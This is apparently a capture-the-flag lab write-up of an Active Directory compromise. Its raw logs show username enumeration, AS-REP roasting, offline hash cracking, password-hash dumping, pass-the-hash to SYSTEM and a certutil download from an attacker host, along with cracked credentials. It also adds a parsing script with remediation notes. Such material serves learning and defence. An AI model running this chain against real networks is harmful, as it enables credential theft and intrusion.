Info: Uploading pwdump8.exe to C:\Users\puckie\Documents\pwdump8.exe


Data: 1479336 bytes of 1479336 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\puckie\Documents> ./pwdump8.exe

PwDump v8.2 - dumps windows password hashes - by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it

Administrator:500:AAD3[redacted]04EE:E6E9[redacted]91B7
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

*Evil-WinRM* PS C:\Users\puckie\Documents>
E:\OSCP>psexecimpacket.exe -hashes AAD3[redacted]04EE:E6E9[redacted]91B7 administrator@10.10.144.236
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Requesting shares on 10.10.144.236.....
[*] Found writable share ADMIN$
[*] Uploading file bgMvCpRw.exe
[*] Opening SVCManager on 10.10.144.236.....
[*] Creating service yUne on 10.10.144.236.....
[*] Starting service yUne.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
Offline
C:\Windows\system32>mkdir puck
C:\Windows\system32>certutil -urlcache -split -f http://10.11.3.122/pwdump8.exe C:\puck\pwdump8.exe

c:\Python37>kerbrute_windows_amd64.exe userenum --dc offline.kingofthe.domain -d kingofthe.domain usernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 05/22/20 - Ronnie Flathers @ropnop

2020/05/22 16:02:50 >  Using KDC(s):
2020/05/22 16:02:50 >   offline.kingofthe.domain:88
2020/05/22 16:02:50 >  [+] VALID USERNAME:       mykull@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       toast@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       administrator@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       puckie@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       guest@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       poki@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       scarra@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       lily@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       yvonne@kingofthe.domain
2020/05/22 16:02:50 >  Done! Tested 9 usernames (9 valid) in 0.083 seconds

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.170.52 -u toast -p 'IsItHotInHere,OrIsItJustMe'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\toast\Documents> cd..
*Evil-WinRM* PS C:\Users\toast> type flag.txt
THM{4F2900F2FDFAF3F77BD599391218F49F}
*Evil-WinRM* PS C:\Users\toast>
root@kali:~/thm/offline# GetNPUsers.py -dc-ip 10.10.236.199 kingofthe.domain/ -usersfile users.txt
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fed doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$lily@KINGOFTHE.DOMAIN:0280f7ba2754b86093c7af807cc3ca86$ff461b2637c7a743c511fde3222bbcb863421513f439504ff292f514e805f2db86796baca3cc9f61f6e5fe1cab686721130d3e056fb4097a2ef2b63e8d6563fb2c22f8b4ac1b5419c9cb5aa5fd0399cec84039a9d63a5feb8d78cc30195ea2857667fad2bb7c4f8c86c58d2ec84d4aaa71994374a2be303793b69648a96ca47edf3ac0af6c9e42244b36e2ef946ed5ac904acbfec7e7ea61471d335fb77b421b1a6d38a754e88121a8fd159ca9723d54b79b8c1213d7e22339c8553e90d3c5cf0d077aaf3c19d75753e0cd9745ef7c7de6dc981df0805eeef9fa627c6589c2bbd48ad8c7b9a51e07ce1c5e8d3adf59622cd5b2fb
[-] User poki doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User scarra doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User toast doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User yvonne doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] invalid principal syntax
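The output above mixes three things: accounts that still require pre-authentication, the one `$krb5asrep$` line for lily (the AS-REP returned for a principal with `UF_DONT_REQUIRE_PREAUTH` set), and two error lines for names that do not exist in the domain. As an added example, not from the post and not impacket's own code, this Python sorts that output per principal and splits the hash line into its fields; `SAMPLE_OUTPUT` is a constructed copy of the output above with the ciphertext blob shortened. The fix on the directory side is clearing bit 0x400000 (`UF_DONT_REQUIRE_PREAUTH`) in the account's `userAccountControl`, which `remediated_uac` shows.

```python
"""Triage impacket GetNPUsers.py output: which principals are roastable,
which still require pre-authentication, and what is inside a $krb5asrep$ line.
Added example; SAMPLE_OUTPUT is a constructed copy of the output on this page
with the ciphertext shortened."""
import re

SAMPLE_OUTPUT = """\
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fed doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$lily@KINGOFTHE.DOMAIN:0280f7ba2754b86093c7af807cc3ca86$ff461b2637c7a743c511fde3222bbcb863421513f439504f
[-] User poki doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] invalid principal syntax
"""

# $krb5asrep$<etype>$<user>@<REALM>:<checksum-hex>$<ciphertext-hex>
ASREP_RE = re.compile(r"^\$krb5asrep\$(\d+)\$([^@$]+)@([^:]+):([0-9a-fA-F]+)\$([0-9a-fA-F]+)$")
PREAUTH_OK_RE = re.compile(r"^\[-\] User (\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set$")
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}
UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl bit (MS-ADTS / MS-SAMR)


def parse_asrep(line):
    """Split one $krb5asrep$ line into its fields, or return None."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    etype, user, realm, checksum, cipher = m.groups()
    return {
        "etype": int(etype),
        "etype_name": ETYPE_NAMES.get(int(etype), "unknown"),
        "user": user,
        "realm": realm,
        "checksum_bytes": len(checksum) // 2,   # 16 for RC4-HMAC's HMAC-MD5 checksum
        "cipher_bytes": len(cipher) // 2,
    }


def triage(output):
    """Map each principal named in the output to 'roastable' or 'preauth-required'.

    Error lines (unknown principals, syntax errors) name no account and are skipped."""
    status = {}
    for line in output.splitlines():
        m = PREAUTH_OK_RE.match(line)
        if m:
            status[m.group(1)] = "preauth-required"
            continue
        rep = parse_asrep(line)
        if rep:
            status[rep["user"]] = "roastable"
    return status


def remediated_uac(uac):
    """userAccountControl with pre-authentication enforced again."""
    return uac & ~UF_DONT_REQUIRE_PREAUTH


if __name__ == "__main__":
    print(triage(SAMPLE_OUTPUT))
    print(parse_asrep(SAMPLE_OUTPUT.splitlines()[2]))
```

Etype 23 means the KDC answered with an RC4-HMAC AS-REP, which is what makes the offline guessing shown below cheap; on the monitoring side, TGT requests are logged as event 4768, and a Pre-Authentication Type of 0 in that event is the same condition seen from the domain controller.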
E:\PENTEST\hashcat>hashcat32.exe -m 18200 -a 0 -w 3 kingofthedomain.hash e:\pentest\hashcat\rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: Intel(R) Corporation
========================================
* Device #1: Intel(R) HD Graphics 610, 819/1638 MB allocatable, 12MCU
* Device #2: Intel(R) Pentium(R) CPU 4415U @ 2.30GHz, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Dictionary cache built:
* Filename..: e:\pentest\hashcat\rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 10 secs

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$lily@KINGOFTHE.DOMAIN:0280f7ba2754b86...d5b2fb
Time.Started.....: Thu May 21 13:34:57 2020 (8 secs)
Time.Estimated...: Thu May 21 13:35:31 2020 (26 secs)
Guess.Base.......: File (e:\pentest\hashcat\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 415.6 kH/s (91.29ms) @ Accel:64 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 3391488/14344384 (23.64%)
Rejected.........: 0/3391488 (0.00%)
Restore.Point....: 3391488/14344384 (23.64%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: taz1997 -> taladascercal

$krb5asrep$23$lily@KINGOFTHE.DOMAIN:0280f7ba2754b86093c7af807cc3ca86$ff461b2637c7a743c511fde3222bbcb863421513f439504ff292f514e805f2db86796baca3cc9f61f6e5fe1cab686721130d3e056fb4097a2ef2b63e8d6563fb2c22f8b4ac1b5419c9cb5aa5fd0399cec84039a9d63a5feb8d78cc30195ea2857667fad2bb7c4f8c86c58d2ec84d4aaa71994374a2be303793b69648a96ca47edf3ac0af6c9e42244b36e2ef946ed5ac904acbfec7e7ea61471d335fb77b421b1a6d38a754e88121a8fd159ca9723d54b79b8c1213d7e22339c8553e90d3c5cf0d077aaf3c19d75753e0cd9745ef7c7de6dc981df0805eeef9fa627c6589c2bbd48ad8c7b9a51e07ce1c5e8d3adf59622cd5b2fb:lolily

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$lily@KINGOFTHE.DOMAIN:0280f7ba2754b86...d5b2fb
Time.Started.....: Thu May 21 13:34:57 2020 (15 secs)
Time.Estimated...: Thu May 21 13:35:12 2020 (0 secs)
Guess.Base.......: File (e:\pentest\hashcat\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 414.3 kH/s (91.35ms) @ Accel:64 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 6144000/14344384 (42.83%)
Rejected.........: 0/6144000 (0.00%)
Restore.Point....: 6094848/14344384 (42.49%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: lookie123 -> lizyjeancarlos

Started: Thu May 21 13:34:42 2020
Stopped: Thu May 21 13:35:14 2020

E:\PENTEST\hashcat>
Or we use John:

E:\john-1.9.0-jumbo-1-win64\run>john.exe kingofthedomain.hash -wordlist=e:\pentest\hashcat\rockyou.txt
Warning: detected hash type "krb5asrep", but the string is also recognized as "krb5asrep-aes-opencl"
Use the "--format=krb5asrep-aes-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE4.1 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 24.27% (ETA: 13:53:30) 0g/s 489115p/s 489115c/s 489115C/s snickers47..snezzticle
lolily ($krb5asrep$23$lily@KINGOFTHE.DOMAIN)
1g 0:00:00:12 DONE (2020-05-21 13:53) 0.08112g/s 495344p/s 495344c/s 495344C/s lolita11311813..lolih8jews
Use the "--show" option to display all of the cracked passwords reliably
Session completed

E:\john-1.9.0-jumbo-1-win64\run>type john.pot
$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm:spiderman123
$krb5asrep$23$0280f7ba2754b86093c7af807cc3ca86$ff461b2637c7a743c511fde3222bbcb863421513f439504ff292f514e805f2db86796baca3cc9f61f6e5fe1cab686721130d3e056fb4097a2ef2b63e8d6563fb2c22f8b4ac1b5419c9cb5aa5fd0399cec84039a9d63a5feb8d78cc30195ea2857667fad2bb7c4f8c86c58d2ec84d4aaa71994374a2be303793b69648a96ca47edf3ac0af6c9e42244b36e2ef946ed5ac904acbfec7e7ea61471d335fb77b421b1a6d38a754e88121a8fd159ca9723d54b79b8c1213d7e22339c8553e90d3c5cf0d077aaf3c19d75753e0cd9745ef7c7de6dc981df0805eeef9fa627c6589c2bbd48ad8c7b9a51e07ce1c5e8d3adf59622cd5b2fb:lolily
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.236.199 -u lily -p 'lolily'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\lily\Documents> cd ..
*Evil-WinRM* PS C:\Users\lily> type flag.txt
THM{89F288757F4D0693C99B007855FC075E}
*Evil-WinRM* PS C:\Users\lily> whoami
kingofthedomain\lily
Author: Jacco Straathof